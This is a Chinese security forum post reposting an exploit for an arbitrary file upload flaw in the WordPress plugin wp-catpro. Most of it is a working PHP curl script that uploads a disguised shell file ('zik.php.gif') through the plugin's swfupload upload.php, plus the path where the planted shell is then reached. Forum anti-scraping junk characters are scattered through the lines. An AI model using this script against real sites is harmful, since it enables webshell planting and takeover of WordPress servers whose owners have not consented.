找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2185|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
5 v9 f% ]9 Q. i5 X#-----------------------------------------------------------------------
2 B' x- U0 f  a! F2 }9 c 7 h. ]5 D5 T) V6 z7 h# N7 s
作者  => Zikou-16/ i" _. h) y7 L- \
邮箱 => zikou16x@gmail.com9 O# b6 t3 x" s6 g9 j+ T) F+ D
测试系统 : Windows 7 , Backtrack 5r31 F6 o* U4 b0 \! k$ |0 f
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
& |$ T3 j5 B) X! Q* E####% W# B) w5 \, ^

( O' T- a- V: |2 X' `; c# n( `#=> Exploit 信息:: c: y- s2 J9 f4 z
------------------
* n5 d! d1 H% u7 P9 p) E# 攻击者可以上传 file/shell.php.gif: `- [# k7 g- X: H; p0 S+ ]
# ("jpg", "gif", "png")  // Allowed file extensions
" f2 ~9 [& A1 Z: z7 H- d3 O# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)3 m* c9 \' w. j4 m/ W3 p
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
" x( D% B8 z9 Z------------------
- v9 U2 ^! F/ z, U" A, n
0 D7 Y3 K, y) u2 Q3 S#=> Exploit
2 \" g4 @6 Q; x+ U3 x-----------: f; N, l1 b( f' H6 p9 l! \8 A6 h
<?php
. N* T- C! S2 b0 {5 d
6 ~7 m) a0 o' M- y$ T$uploadfile="zik.php.gif";8 d. F% R' M: B  H; s
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
4 T! ~$ y0 W3 T) ~- {* vcurl_setopt($ch, CURLOPT_POST, true);$ ^* ]8 n) A0 E8 A
curl_setopt($ch, CURLOPT_POSTFIELDS,
/ H7 z; m! d% a0 B/ J$ `# Narray('Filedata'=>"@$uploadfile",/ M) V4 ?9 [! b5 K5 g- E
'folder'=>'/wp-content/uploads/catpro/'));# u( [8 t+ K8 ~$ {
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4 _$ u/ d0 N' Z& \' e# A$postResult = curl_exec($ch);
: @: X: |! B' ]# x+ G8 `curl_close($ch);
) ?* h/ |- o2 w+ s8 x9 i8 M6 R. U ; b8 F8 s8 M6 |: o9 I* m
print "$postResult";2 {# P4 W" V7 q8 t

5 D  V/ G7 e# J" s' S2 BShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
6 l0 B7 k( C0 ^; O8 x  ?>! v3 G4 h! j8 F6 n2 d2 ^3 J
<?php3 Z2 W- \  v5 @2 z( W2 V$ P
phpinfo();+ t; G/ o- `, m2 A* S
?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表